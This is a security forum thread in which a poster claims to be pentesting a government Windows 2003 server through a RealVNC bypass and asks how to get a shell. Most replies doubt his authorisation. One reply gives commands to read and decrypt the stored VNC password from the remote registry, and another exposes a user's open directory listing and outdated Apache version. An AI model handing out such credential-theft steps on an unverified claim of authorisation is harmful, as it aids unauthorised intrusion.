Hacking RealVNC

[alienstargate]

Ok ppl have a question,

i'm doing a pentest on a gov instance and founs some intresting stuff...

For now i'm focusing on VNC, i was able to runs the vnc 4.1 bypass exploit so am able to get the login screen of a 2k3 server.

My question is: is there a way to use some other exploit on the vnc or trough the vnc or inject something in there so i can get acces to the machine? think of a command shell or add users etc.

pls advice!

[imported_wyze]

Ok ppl have a question,

i'm doing a pentest on a gov instance and founs some intresting stuff...

For now i'm focusing on VNC, i was able to runs the vnc 4.1 bypass exploit so am able to get the login screen of a 2k3 server.

My question is: is there a way to use some other exploit on the vnc or trough the vnc or inject something in there so i can get acces to the machine? think of a command shell or add users etc.

pls advice!

You're hacking the government?

[alienstargate]

YES!!!!

it's a project i've scored so i'm allowed to test their security (externaly)
anyway any advice?

[Archangel-Amael]

Of what country ?
Is it possible you could slip me a pm with the name of the company you work for so maybe I could apply for a job there too?

[Thorn]

Of what country ?

China, testing the US DOD.



And it is just me, or are picture signatures one of the most annoying things people can do on a forum?

[williamc]

Code:

net use \\ipaddress /u:user password

Code:

regread.exe \\ipaddress software\orl\winvnc3\default Password | grep -v [g-zG-Z] | tr -d [:blank:]

This will get you the encrypted password. Then use vncpwdump.exe to decrypt it.

William

[theprez98]

And it is just me, or are picture signatures one of the most annoying things people can do on a forum?

Sorry, it's just you.

I'd ban them if I could.

[Archangel-Amael]

China, testing the US DOD.

Darn and I was hoping I good get a job and get rich quick or something.
Not to mention the war stories I could tell.

[thorin]

Maybe I'm being overly harsh but I call BS.

How do you land a Gov't contract with the skills (writing and technical) demonstrated in the original post?

And it is just me, or are picture signatures one of the most annoying things people can do on a forum?

No it's not just you. I often end up adblocking things like that.

Sorry, it's just you.

I'd ban them if I could.

Huh? It's just him but you'd ban them if you could?

Oh looky looky, sig pic is in a list'able directory (as are the parent directories):
http://home.hccnet.nl/ea.abbink/images/alien/

Even better, seemingly way out of date apache server:

Code:

Apache/1.3.26 Server at home.hccnet.nl Port 80

[Archangel-Amael]

Maybe I'm being overly harsh but I call BS.

How do you land a Gov't contract with the skills (writing and technical) demonstrated in the original post?

Well I thought the same thing, but I was hoping to get rich quick and be able to tell some tales of the ol' tiger team hax0rs the big bad gov.

Oh looky looky, sig pic is in a list'able directory (as are the parent directories):
http://home.hccnet.nl/ea.abbink/images/alien/

Even better, seemingly way out of date apache server:

Code:

Apache/1.3.26 Server at home.hccnet.nl Port 80

OOPS! Maybe that was not meant to be seen, or maybe it's part of a uber leet honeypot!